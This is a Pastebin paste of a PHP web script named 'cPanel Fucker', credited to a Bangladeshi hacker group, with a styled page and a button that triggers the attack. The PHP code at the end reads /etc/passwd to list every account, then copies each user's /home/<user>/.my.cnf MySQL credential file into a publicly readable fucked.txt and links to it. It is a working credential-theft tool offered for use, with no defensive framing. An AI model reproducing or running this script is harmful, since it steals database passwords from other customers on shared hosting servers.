N1nj2x

Col2.php

Aug 7th, 2017
43
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.82 KB | None | 0 0
  1. <link rel="SHORTCUT ICON" type="image/x-icon" href="http://s13.postimg.org/d82nq5frb/UBHFinal1.png">
  2. <title>cPanel Fucker</title>
  3. <style>
  4. @import url(http://fonts.googleapis.com/css?family=Lobster);
  5.  
  6. body {
  7. background-color:#000;
  8. color:red;
  9. margin: 0;
  10. padding: 0;
  11. font-family: "Lobster", cursive;
  12. }
  13.  
  14. input {
  15. border:3px solid #ddd;
  16. background-color:#333;
  17. font:12pt Verdana;
  18. color: #ddd;
  19. padding: 4px 3px;
  20. transition: all .3s;
  21. cursor: pointer;
  22. }
  23.  
  24. input:hover {
  25. border:3px solid #333;
  26. background-color:#ddd;
  27. color: #333;
  28. }
  29.  
  30. a {
  31. color:#0FF;
  32. text-decoration:none
  33. }
  34.  
  35. a:hover {
  36. color:#fff
  37. }
  38.  
  39. p {
  40. background-color:#000;
  41. border:1px solid #0FF;
  42. color:#fff;
  43. position:fixed;
  44. bottom:0;
  45. width:100%
  46. }
  47. </style>
  48. </head>
  49. <body>
  50. <center>
  51. <a href="https://www.facebook.com/groups/united.bangladeshi.hacker/" target="_blank"> <img src="http://s13.postimg.org/d82nq5frb/UBHFinal1.png" border="0"></a>
  52. <h2>cPanel Fucker By D3t0N4t0R || Powerin10</h2>
  53. <form method="get">
  54. <input type="submit" name="do" value="kupa cpanel"><br><br>
  55. </form>
  56. <p>Coded by Mehedi (D3t0N4t0R) || Special thanks to Powerin10</p>
  57. </body> <?php if (isset($_GET['do'])) { if ($_GET['do'] == 'kupa cpanel') { $users = file("/etc/passwd"); $lolx = array(); foreach ($users as $user) { $users = explode(":", $user); $lolx[] = $users[0]; } foreach ($lolx as $lol) { if (file_exists("/home/{$lol}/.my.cnf")) { $garam = file_get_contents("/home/{$lol}/.my.cnf"); if (!empty($garam)) { $masala = $garam . "
  58. "; $handle = fopen('fucked.txt', 'a'); fwrite($handle, $masala); } } } if (filesize('fucked.txt') > 0) { $url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/fucked.txt'; echo '<a href="' . $url . '" target="_blank">Fucked cPanels</a>'; } } } ?>
Advertisement
Add Comment
Please, Sign In to add comment